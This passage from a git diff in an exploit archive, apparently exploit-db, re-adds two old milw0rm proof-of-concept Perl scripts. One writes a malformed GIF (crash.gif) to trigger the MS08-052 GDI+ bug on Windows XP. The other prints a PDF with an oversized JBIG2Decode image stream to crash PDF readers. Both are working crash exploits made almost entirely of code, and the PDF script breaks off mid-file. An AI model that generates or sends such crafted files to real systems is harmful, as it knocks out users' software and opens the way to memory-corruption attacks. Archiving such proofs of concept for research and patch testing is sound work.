-"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". -#1 -"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". -#2 -"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". -#3 -"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". -#4 -"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". -"\x00". # Terminator -"\x3B". # Trailer - -open(out, "> crash.gif"); -binmode(out); -print (out $gif); -close(out); - -# milw0rm.com [2008-10-09] +------------------------------------------------------------------------------------------------------------ +Operating System: XP SP2 +Gdiplus.dll Version: 5.1.3102.2180 + +Credit: + +John Smith, +Evil Fingers + +GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt + +PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt + +http://www.evilfingers.com/patchTuesday/PoC.php +============================================================================================================ + +#!/usr/bin/perl +# +use strict; + +my $gif = + +"\x47\x49\x46\x38\x39\x61". # GIF header +"\x65\x00\x65\x00\xF7\x0B\x0B". # Logical Screen Descriptor +# COLOR Stream +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x21". ## Extension Introducer 0x21 +"\x2C". ## Label 0x2C +# Data Sub-blocks (1) Size: 21+1 +#0 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#1 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC". +"\x21\xEC". +#2 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#3 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#4 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#5 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#6 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#7 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#8 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#9 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#10 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#11 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x2C\x00\x00\x00\x00\x0E". +"\x01\x5A". +"\x00". ## Terminator +"\x21". ## Extension Introducer 0x21 +"\x2C". ## Label 0x2C +# Data Sub-blocks (2) Size: EC+1 +#0 +"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". +#1 +"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". +#2 +"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". +#3 +"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". +#4 +"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". +"\x00". # Terminator +"\x3B". # Trailer + +open(out, "> crash.gif"); +binmode(out); +print (out $gif); +close(out); + +# milw0rm.com [2008-10-09] diff --git a/platforms/windows/dos/8099.pl b/platforms/windows/dos/8099.pl index b3f20e709..c5bc66b27 100755 --- a/platforms/windows/dos/8099.pl +++ b/platforms/windows/dos/8099.pl @@ -1,90 +1,90 @@ -#!/usr/bin/perl -# k`sOSe 02/22/2009 - -# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html - -my $size = "\x40\x00"; -my $factor = "ABCD"; -my $data = "A" x 8314; - - -print pdf(); - -sub pdf() -{ - -"%PDF-1.5\n" . -"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" . -"3 0 \n" . -"xref\n" . -"3 16\n" . -"0000000023 00000 n \n" . -"0000000584 00000 n \n" . -"0000000865 00000 n \n" . -"0000001035 00000 n \n" . -"0000001158 00000 n \n" . -"0000001287 00000 n \n" . -"0000001338 00000 n \n" . -"0000001384 00000 n \n" . -"0000002861 00000 n \n" . -"0000003637 00000 n \n" . -"0000005126 00000 n \n" . -"0000005173 00000 n \n" . -"0000005317 00000 n \n" . -"0000005370 00000 n \n" . -"0000005504 00000 n \n" . -"0000000714 00000 n \n" . -"trailer\n" . -"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" . -"startxref\n" . -"0\n" . -"%%EOF\n" . -" \n" . -"4 0 obj\n" . -"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" . -"endobj\n" . -" \n" . -"5 0 obj\n" . -"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" . -"endobj\n" . -"6 0 obj\n" . -"<</Length 56/Filter/FlateDecode>>\n" . -"stream\n" . -"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" . -"S\xb0\n" . -"\x00J\x15#,\n" . -"endstream\n" . -"endobj\n" . - -"12 0 obj\n" . -"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" . -"stream\n" . -"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" . -"endobj\n" . -"13 0 obj\n" . -"<</Type/OCG/Name(Text Color)>>\n" . -"endobj\n" . -"14 0 obj\n" . -"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" . -"stream\n" . -"\x00\n" . -"endstream\n" . -"endobj\n" . - -"1 0 obj\n" . -"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" . -"endobj\n" . -"xref\n" . -"0 3\n" . -"0000000000 65535 f \n" . -"0000009988 00000 n \n" . -"0000010039 00000 n \n" . -"trailer\n" . -"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" . -"startxref\n" . -"104\n" . -"%%EOF\n"; - -} - -# milw0rm.com [2009-02-23] +#!/usr/bin/perl +# k`sOSe 02/22/2009 + +# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html + +my $size = "\x40\x00"; +my $factor = "ABCD"; +my $data = "A" x 8314; + + +print pdf(); + +sub pdf() +{ + +"%PDF-1.5\n" . +"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" . +"3 0 \n" . +"xref\n" . +"3 16\n" . +"0000000023 00000 n \n" . +"0000000584 00000 n \n" . +"0000000865 00000 n \n" . +"0000001035 00000 n \n" . +"0000001158 00000 n \n" . +"0000001287 00000 n \n" . +"0000001338 00000 n \n" . +"0000001384 00000 n \n" . +"0000002861 00000 n \n" . +"0000003637 00000 n \n" . +"0000005126 00000 n \n" . +"0000005173 00000 n \n" . +"0000005317 00000 n \n" . +"0000005370 00000 n \n" . +"0000005504 00000 n \n" . +"0000000714 00000 n \n" . +"trailer\n" . +"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" . +"startxref\n" . +"0\n" . +"%%EOF\n" . +" \n" . +"4 0 obj\n" . +"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" . +"endobj\n" . +" \n" . +"5 0 obj\n" . +"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" . +"endobj\n" . +"6 0 obj\n" . +"<</Length 56/Filter/FlateDecode>>\n" . +"stream\n" . +"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" . +"S\xb0\n" . +"\x00J\x15#,\n" . +"endstream\n" . +"endobj\n" . + +"12 0 obj\n" . +"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" . +"stream\n" . +"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" . +"endobj\n" . +"13 0 obj\n" . +"<</Type/OCG/Name(Text Color)>>\n" . +"endobj\n" . +"14 0 obj\n" . +"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" . +"stream\n" . +"\x00\n" . +"endstream\n" . +"endobj\n" . + +"1 0 obj\n" . +"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" . +"endobj\n" . +"xref\n" . +"0 